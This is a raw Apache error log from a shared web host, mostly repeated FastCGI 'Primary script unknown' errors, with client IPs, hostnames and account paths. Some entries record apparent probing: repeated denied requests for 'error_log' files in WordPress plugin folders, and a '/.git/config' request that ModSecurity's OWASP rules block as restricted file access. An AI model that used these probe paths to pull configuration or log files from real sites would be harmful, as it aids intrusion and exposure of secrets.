[Mon May 11 14:28:20.353044 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.442516 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.554398 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.646415 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.735731 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.857451 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:20.946777 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.037083 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.158697 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.273119 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.362498 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.462706 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.558888 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.648139 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.863101 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.952666 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:21.992098 2026] [authz_core:error] [pid 1319885:tid 1319900] [client 88.88.156.124:59592] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 14:28:22.046563 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.137289 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.226357 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.323816 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.412922 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.506404 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.595936 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.689025 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.785057 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.881006 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:22.987765 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.232035 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.322637 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.419046 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.531684 2026] [authz_core:error] [pid 1319885:tid 1319900] [client 88.88.156.124:59592] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 14:28:23.623575 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.713262 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.802527 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.891594 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:23.981438 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.070576 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.159632 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.250120 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.339829 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.436321 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.526412 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.616144 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.707475 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.813319 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.905044 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:24.994545 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.061332 2026] [authz_core:error] [pid 1319885:tid 1319900] [client 88.88.156.124:59592] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 14:28:25.103176 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.206378 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.328901 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.418756 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.508353 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.599898 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.690179 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.780280 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.870800 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:25.961611 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.051107 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.141820 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.250786 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.340144 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.429661 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.586253 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.593281 2026] [authz_core:error] [pid 1319885:tid 1319900] [client 88.88.156.124:59592] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/domain/add-ons/error_log
[Mon May 11 14:28:26.675905 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.778747 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.868425 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:26.965941 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.061671 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.151095 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.240524 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.361952 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.461792 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.551478 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.640606 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.751953 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:27.844941 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:28.016508 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:28.105697 2026] [proxy_fcgi:error] [pid 1319998:tid 1320003] [client 172.190.142.176:50907] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:28.653626 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:28.797362 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:28.886483 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:28.979320 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.068828 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.163813 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.264500 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.364224 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.454291 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.547166 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.636338 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.725267 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.814624 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:29.922141 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.011338 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.113884 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.489891 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.578680 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.669286 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.762438 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.852806 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:30.942002 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.031220 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.196876 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.298462 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.433349 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.522607 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.623894 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.724710 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.813692 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:31.866786 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 88.88.156.124:50258] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 14:28:31.903083 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.093759 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.186256 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.356325 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.445417 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.539008 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.628253 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.717046 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.805978 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:32.989814 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.118620 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.207690 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.294540 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 88.88.156.124:50258] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 14:28:33.296454 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.385726 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.479250 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.743059 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.832067 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:33.938144 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:34.048293 2026] [proxy_fcgi:error] [pid 1319885:tid 1319920] [client 172.190.142.176:22523] AH01071: Got error 'Primary script unknown'
[Mon May 11 14:28:34.843372 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 88.88.156.124:50258] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 14:28:36.672774 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 88.88.156.124:50258] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/error_log
[Mon May 11 14:28:45.944098 2026] [security2:error] [pid 1319885:tid 1319927] [client 206.189.247.132:45665] ModSecurity: Warning. Pattern match "^$" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "353"] [id "920330"] [rev "1"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EMPTY_HEADER_UA"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHLfVchVQ3tCn0m9OpH9QAAARQ"]
[Mon May 11 14:28:46.029026 2026] [security2:error] [pid 1319885:tid 1319927] [client 206.189.247.132:45665] ModSecurity: Warning. Pattern match "^$" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "353"] [id "920330"] [rev "1"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EMPTY_HEADER_UA"] [hostname "www.piregwan-genesis.com"] [uri "/liens/"] [unique_id "agHLflchVQ3tCn0m9OpH9gAAARQ"]
[Mon May 11 14:29:22.592762 2026] [authz_core:error] [pid 1319998:tid 1320011] [client 47.128.58.6:51334] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/error_log
[Mon May 11 14:29:32.985963 2026] [security2:error] [pid 1319885:tid 1319935] [client 43.157.62.101:51120] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agHLrFchVQ3tCn0m9OpIMwAAARc"]
[Mon May 11 14:29:34.863812 2026] [security2:error] [pid 1320674:tid 1320712] [client 43.157.62.101:33686] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agHLrqO9RdIr1DwxYR2CDQAAANc"], referer: http://castiglionecf.com
[Mon May 11 14:29:36.866450 2026] [security2:error] [pid 1319885:tid 1319907] [client 43.157.62.101:36840] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agHLsFchVQ3tCn0m9OpINgAAAQw"], referer: https://castiglionecf.com/
[Mon May 11 14:30:06.965085 2026] [authz_core:error] [pid 1319998:tid 1320005] [client 88.88.156.124:55114] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/tasks/error_log
[Mon May 11 14:30:08.497914 2026] [authz_core:error] [pid 1319998:tid 1320005] [client 88.88.156.124:55114] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/tasks/error_log
[Mon May 11 14:30:10.187632 2026] [authz_core:error] [pid 1319998:tid 1320005] [client 88.88.156.124:55114] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/task-list/domain/tasks/error_log
[Mon May 11 14:30:25.034224 2026] [security2:error] [pid 1320674:tid 1321055] [client 35.246.63.180:43822] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHL4aO9RdIr1DwxYR2CSgAAAMw"]
[Mon May 11 14:30:25.034557 2026] [security2:error] [pid 1320674:tid 1321055] [client 35.246.63.180:43822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHL4aO9RdIr1DwxYR2CSgAAAMw"]
[Mon May 11 14:30:25.035600 2026] [security2:error] [pid 1320674:tid 1321055] [client 35.246.63.180:43822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHL4aO9RdIr1DwxYR2CSgAAAMw"]
[Mon May 11 14:30:26.308873 2026] [authz_core:error] [pid 1320398:tid 1320408] [client 88.88.156.124:53910] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/error_log
[Mon May 11 14:30:29.660405 2026] [authz_core:error] [pid 1319885:tid 1319930] [client 88.88.156.124:55596] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
